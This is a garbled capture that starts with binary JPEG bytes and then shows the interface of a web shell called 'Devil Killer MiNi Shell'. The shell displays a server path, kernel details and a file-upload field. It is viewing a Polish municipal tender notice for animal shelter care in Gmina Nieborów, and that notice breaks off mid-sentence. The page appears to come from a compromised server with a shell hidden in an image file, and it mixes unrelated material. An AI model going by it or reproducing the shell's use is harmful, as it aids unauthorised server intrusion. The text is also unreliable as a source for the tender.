JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241212/0064822501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> ZAPEWNIENIE OPIEKI ZWIERZĘTOM Z TERENU GMINY NIEBORÓW ORAZ ZAPOBIEGANIE BEZDOMNOŚCI ZWIERZĄT W OKRESIE <br/>OD 01.01.2025 R. DO 31.12.2025 R. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Nieborów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 750148360</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Legionów Polskich 26</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nieborów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">99-416</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL715 - Skierniewicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">468385613</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@nieborow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.nieborow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZAPEWNIENIE OPIEKI ZWIERZĘTOM Z TERENU GMINY NIEBORÓW ORAZ ZAPOBIEGANIE BEZDOMNOŚCI ZWIERZĄT W OKRESIE <br/>OD 01.01.2025 R. DO 31.12.2025 R. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3cdf40a8-7967-4da3-a25f-ac3c0ab966d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00648225</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00004223/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 ZAPEWNIENIE OPIEKI ZWIERZĘTOM Z TERENU GMINY NIEBORÓW ORAZ ZAPOBIEGANIE BEZDOMNOŚCI ZWIERZĄT W OKRESIE OD 01.01.2025 R. DO 31.12.2025 R.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gmina-nieborow.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://gmina-nieborow.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną za pośrednictwem Platformy<br/>Zakupowej znajdującej się pod adresem: https://gmina-nieborow.ezamawiajacy.pl/<br/>2. Instrukcja korzystania z Platformy jest dostępna pod wyżej wskazanym adresem w zakładce „Regulacje i procedury procesu<br/>zakupowego” oraz stanowi załącznik nr 13 do SWZ.<br/>3. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w<br/>terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem wyznaczonego terminu.<br/>4. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich złożenia/wysłania na Platformie.<br/>Ogólne zasady korzystania z Platformy:<br/>1. Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Gminy Nieborów https://gminanieborow.<br/>ezamawiajacy.pl/ lub https://oneplace.marketplanet.pl,<br/>2. Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/>kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/>regulamin, klika polecenie „zarejestruj się”.<br/>3. W uzasadnionych przypadkach (np. wprowadzenie danych niezgodnych z danymi rejestrowymi) rejestracja Wykonawcy może<br/>potrwać maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego<br/>na rejestrację w procesie złożenia oferty w postaci elektronicznej.<br/>4. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje, o możliwości przyspieszenia procedury<br/>założenia konta, wówczas należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu.<br/>Zamawiający, określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie tj.:<br/>1. Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2. Komputer klasy PC lub MAC, z aktualnym systemem operacyjnym wspieranym przez producenta;<br/>3. Zainstalowana dowolna przeglądarka internetowa wspierana przez producenta MS Internet Explorer, Firefox, Google Chrome lub<br/>MS Edge;<br/>4. Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf;<br/>5. Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w txt, pdf, doc, xls, docx, zip,<br/>7z, tar, gz, xml, XAdES.<br/>6. Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.:<br/>7. Plik załączony przez Wykonawcę na Platformie i zapisany, widoczny jest w systemie, jako zaszyfrowany – format kodowania<br/>UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.<br/>8. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego<br/>serwera synchronizowanego odpowiednim źródłem czasu - zegarem Głównego Urzędu Miar.<br/>9. Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca<br/>winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa Gmina Nieborów tel. +48 22 257 22 23<br/>(infolinia dostępna w dni robocze, w godzinach 9.00-17.00) e-mail: oneplace@marketplanet.pl<br/>10. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej zwanym „RODO”, informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Gmina Nieborów reprezentowana przez Wójta Gminy Nieborów z siedzibą w<br/>Urzędzie Gminy Nieborów przy Al. Legionów Polskich 26, 99-416 Nieborów. Z administratorem można się skontaktować listownie na<br/>adres podany w Dziale I swz.<br/>2. Inspektorem ochrony danych osobowych w Gminie Nieborów jest Robert Żuchowski e-mail: iodo@spotcase.pl<br/>3. Administrator będzie przetwarzał Pani/Pana dane osobowe w celu realizacji obowiązku prawnego nałożonego na administratora<br/>(art. 6 ust. 1 lit. c RODO) wynikającego z ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych obejmującego<br/>przeprowadzenie postępowania o udzielenie zamówienia publicznego, zawarcie i wykonania umowy oraz prowadzenia dokumentacji<br/>z nią związanej.<br/>4. Podanie danych osobowych jest wymogiem ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Pzp.<br/>5. Dane osobowe mogą być ujawnione jedynie właściwie upoważnionym osobom fizycznym, prawnym lub innym odbiorcom<br/>posiadającym podstawę prawną żądania dostępu do danych osobowych oraz odbiorcom, którym muszą zostać ujawnione dane<br/>zgodnie z obowiązującymi przepisami prawa. Odbiorcami danych mogą być osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 ust. 1 Ustawy pzp Odbiorcą danych będzie spółka Otwarty Rynek Elektroniczny S.A.<br/>siedzibą w Warszawie (02-672) przy ul. Domaniewskiej 49, wpisaną do Rejestru Przedsiębiorców Krajowego Rejestru Sądowego,<br/>prowadzonego przez Sąd Rejonowy dla m.st. Warszawy w Warszawie XIII Wydział Gospodarczy Krajowego Rejestru Sądowego<br/>pod numerem KRS: 0000041441, REGON: 017282436, NIP: 526-25-35-153, jako właściciel Platformy Zakupowej, na której Gmina<br/>Nieborów prowadzi postępowania o udzielenie zamówienia publicznego, działającą pod adresem: https://gminanieborow.<br/>ezamawiajacy.pl/<br/>6. Administrator będzie przechowywać Państwa dane osobowe do chwili załatwienia sprawy, a następie przez okres wynikający z<br/>zasad określonych w Rozporządzeniu z dnia 18 stycznia 2011 roku w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych<br/>wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych.<br/>7. W uzasadnionych przypadkach przysługują Pani/Panu następujące prawa:<br/>1) prawo dostępu do treści swoich danych oraz otrzymania ich kopii<br/>2) prawo sprostowania oraz uzupełnienia danych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z Pzp oraz nie może<br/>naruszać integralności protokołu oraz jego załączników)<br/>3) prawo do ograniczenia przetwarzania (prawo do ograniczenia przetwarzania nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia tego postępowania),<br/>4) prawo wniesienia skargi do PUODO (Prezes Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Pani/Panu:<br/>1) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ROS.6140.40.2024.MW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem umowy jest zapewnienie opieki zwierzętom z terenu Gminy Nieborów oraz zapobieganie bezdomności<br/>zwierząt w okresie od 01.01.2025 r. do 31.12.2025 r.<br/>2. Szczegółowy opis przedmiotu zamówienia, określony został w „Opisie Przedmiotu Zamówienia” stanowiącym załącznik nr<br/>12 do SWZ.<br/>3. W ramach zamówienia Wykonawca zobowiązany jest do przyjęcia od dotychczas świadczącego usługi przedsiębiorcy<br/>zwierząt należących do Gminy Nieborów w terminie: w dniu podpisania umowy do godziny 15:00, (wg. stanu na dzień<br/>12.12.2024 roku) 44 sztuki zwierząt (w tym 42 psy i 2 koty). Zamawiający zastrzega, że ilość zwierząt do przejęcia może ulec<br/>zmianie, a wynikać to będzie z rzeczywistej liczby zwierząt przebywających w schronisku na dzień rozpoczęcia<br/>obowiązywania umowy zawartej w wyniku niniejszego postępowania. Transport zwierząt do schroniska Wykonawcy zapewni<br/>Wykonawca na swój koszt. Z tytułu przejęcia zwierząt do schroniska Wykonawcy nie przysługuje dodatkowe wynagrodzenie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85200000-1 - Usługi weterynaryjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85210000-3 - Ośrodki pielęgnowania zwierząt domowych</p> <p class="mb-0">98380000-0 - Usługi psiarni</p> <p class="mb-0">98390000-3 - Inne usługi</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za najkorzystniejszą zostanie uznana oferta, która nie zostanie odrzucona na podstawie art. 226 ust.<br/>1 Pzp oraz uzyska najwyższą liczbę punktów na podstawie kryteriów oceny, wymienionych poniżej.<br/>2. Zamawiający przy wyborze oferty będzie kierował się następującymi kryteriami oceny, gdzie 1%=1pkt:<br/>Lp. Nazwa kryterium Waga % (maksymalna liczba punktów)<br/>1 Cena oferty brutto (C), zwana też „Ceną” 60% (60 pkt)<br/>2 Odsetek adopcji (A) 20% (20 pkt)<br/>3 Czas podjęcia interwencji (I)<br/>20% (20 pkt)<br/>3. Sposób oceny w ramach kryteriów oceny ofert<br/>1) Sposób oceny w kryterium „Cena” (C), w kryterium Cena, w którym<br/>Zamawiającemu zależy, aby wykonawca przedstawił jak najniższy wskaźnik (Cena), punkty zostaną przyznane wg. następującego<br/>wzoru:<br/>C = Cmin/Co x 100 x 60%, gdzie:<br/>C – ilość punktów przyznanych danej ofercie w kryterium „Cena”<br/>Cmin – najniższa cena brutto spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>Co – cena brutto oferty badanej<br/>100 – wskaźnik stały<br/>60% - procentowe znaczenie kryterium „Cena”<br/>Liczba punktów, którą można uzyskać w ramach kryterium „Cena” obliczona zostanie ustalona przez podzielenie najniższej ceny<br/>brutto ze złożonych ofert niepodlegających odrzuceniu przez cenę ocenianej oferty i pomnożenie tak otrzymanej liczby przez 100<br/>punktów i wagę kryterium, którą ustalono na 60%.<br/>Najkorzystniejsza oferta w odniesieniu do kryterium „Cena” otrzyma 60 punktów.<br/>2) Sposób oceny w kryterium „Odsetek adopcji” (A)<br/>W ramach tego kryterium oceniany będzie średni odsetek adopcji wyliczony z trzech<br/>ostatnich lat (2020-2022), wskazany przez Wykonawcę w formularzu oferty. Odsetek adopcji należy wyliczyć na podstawie liczby<br/>zwierząt oddanych do adopcji w danym roku, w stosunku do liczby zwierząt pozostałych w schronisku na koniec danego roku. Przy<br/>czym liczba adopcji nie uwzględnia zwierząt odebranych przez jednostki samorządu terytorialnego w związku z wygaśnięciem lub<br/>rozwiązaniem umowy.<br/>Ocena tego kryterium nastąpi na podstawie dostarczonych przez Wykonawcę protokołów z kontroli schroniska lub raportów z<br/>wizytacji schroniska z trzech ostatnich lat 2021-2023<br/>poprzedzających bieżący rok, sporządzonych przez właściwego powiatowego lekarza<br/>weterynarii, w których wskazano liczbę zwierząt w schronisku na koniec roku oraz liczbę<br/>zwierząt adoptowanych, w celu ustalenia liczby adopcji danego wykonawcy (kserokopię ww. protokołów lub raportów należy<br/>dołączyć do oferty).<br/>Wykonawca otrzyma odpowiednią liczbę punktów, zgodnie z poniższym wzorem:<br/>A = Ab/Cn x 100 x 20%, gdzie:<br/>A – ilość punktów przyznanych danej ofercie w kryterium „Odsetek adopcji”<br/>Ab – odsetek adopcji zwierząt oferty badanej wśród ofert nieodrzuconych<br/>An – najwyższy odsetek adopcji zwierząt wśród ofert nieodrzuconych<br/>100 – wskaźnik stały<br/>60% - procentowe znaczenie kryterium „Odsetek adopcji”<br/>3) Sposób oceny w kryterium „Czas podjęcia interwencji” (I)<br/>W ramach tego kryterium oceniany będzie „Czas podjęcia interwencji” (I). Za przedmiotowe kryterium wykonawca może uzyskać<br/>maksymalnie 20 punktów<br/>Ocena punktowa oferty dokonana zostanie w następujący sposób:<br/>Do 20 min. - 20 pkt<br/>Do 30 min. - 15 pkt<br/>Do 40 min. - 10 pkt<br/>Do 50 min. - 5 pkt<br/>Powyżej 55 min. - 0 pkt<br/>Maksymalny wymagany czas realizacji interwencji nie może być dłuższy niż 60 minut.<br/>4. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiada wszystkim wymaganiom przedstawionym w ustawie Pzp<br/>oraz SWZ i otrzyma największą łączną liczbę punktów ze wszystkich kryteriów.<br/>5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej<br/>wadze.<br/>6. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną. (...)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">odsetek adopcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podjęcia interwencji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zamawiający określa poniższe warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym: Zamawiający nie określa tego warunku.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże się posiadaniem<br/>a) aktualnego zezwolenia na prowadzenie działalności w zakresie ochrony przed bezdomnymi zwierzętami na terenie gminy<br/>Nieborów,<br/>b) aktualnego zezwolenia w zakresie prowadzenia schroniska dla bezdomnych zwierząt wydanego przez właściwy organ<br/>zgodnie z ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach,<br/>c) decyzji powiatowego lekarza weterynarii właściwego ze względu na miejsce prowadzenia działalności potwierdzającą<br/>spełnienie wymagań weterynaryjnych w zakresie transportu zwierząt wykonywanego w związku z prowadzeniem innej<br/>działalności gospodarczej, zgodnie z art. 5 ust. 1 ustawy z dnia 11 marca 2004 r. o ochronie zdrowia zwierząt oraz<br/>zwalczaniu chorób zakaźnych zwierząt,<br/>d) decyzji o wpisie schroniska dla zwierząt do rejestru podmiotów prowadzących działalność nadzorowaną prowadzonego<br/>przez Powiatowego Lekarza Weterynarii na obszarze jego właściwości,<br/>e) wpisu do ewidencji zakładów leczniczych dla zwierząt.<br/>3) sytuacji ekonomicznej lub 